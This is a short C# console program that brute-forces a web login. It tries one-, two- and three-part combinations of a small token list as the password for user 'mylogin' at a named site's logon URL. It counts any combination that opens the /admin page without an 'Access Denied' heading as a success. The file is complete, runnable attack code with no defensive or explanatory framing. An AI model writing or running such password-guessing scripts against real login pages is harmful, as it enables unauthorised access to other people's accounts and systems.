﻿using System;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.Text.RegularExpressions;

namespace HttpPostBruteforce
{
    class Program
    {
        private static readonly CookieAwareWebClient webClient = new CookieAwareWebClient();

        static void Main(string[] args)
        {
            var results = new List<string>();
            var keys = new List<string> { "qwe",
                                          "QWE",
                                          "asd",
                                          "aassdd",
                                          "zxc",
                                          "1",
                                          "123",
                                          "112233",
                                          "12345",
                                          "password",
                                          "stefantsov",
                                          "com",
                                          "something",
                                          "like",
                                          "that" };
            
            int counter = 0;
            int counterOverall = keys.Count*keys.Count*keys.Count + keys.Count*keys.Count + keys.Count;
            Console.WriteLine("Processed {0} of {1}", counter, counterOverall);

            #region Trying each token itself

            foreach (var s1 in keys)
            {
                counter++;
                bool unusual = TryKey(s1);
                if (unusual)
                {
                    results.Add(s1);
                    Console.WriteLine(s1);
                }
            }
            Console.WriteLine("Processed {0} of {1}", counter, counterOverall);

            #endregion

            #region Trying combinations of 2 tokens

            foreach (var s1 in keys)
            {
                foreach (var s2 in keys)
                {
                    counter++;
                    bool unusual = TryKey(s1 + s2);
                    if (unusual)
                    {
                        results.Add(s1 + s2);
                        Console.WriteLine(s1 + s2);
                    }
                }
                Console.WriteLine("Processed {0} of {1}", counter, counterOverall);
            }

            #endregion

            #region Trying combinations of 3 tokens

            foreach (var s1 in keys)
            {
                foreach (var s2 in keys)
                {
                    foreach (var s3 in keys)
                    {
                        counter++;
                        bool unusual = TryKey(s1 + s2 + s3);
                        if (unusual)
                        {
                            results.Add(s1 + s2 + s3);
                            Console.WriteLine(s1 + s2 + s3);
                        }
                    }
                    Console.WriteLine("Processed {0} of {1}", counter, counterOverall);
                }
            }

            #endregion
            
            foreach (var r in results)
            {
                Console.WriteLine(r);
            }
            Console.WriteLine("DONE!");
            Console.ReadLine();
        }

        private static bool TryKey(string password)
        {
            var loginData = new NameValueCollection();
            loginData.Add("userNameOrEmail", "mylogin");
            loginData.Add("password", password);
            webClient.UploadValues(@"http://stefantsov.com/Users/Account/LogOn", "POST", loginData);
            string result = webClient.DownloadString(@"http://stefantsov.com/admin");

            return !Regex.Match(result, @"<h1 class=""page-title"">Access Denied</h1>").Success;
        }
    }
}
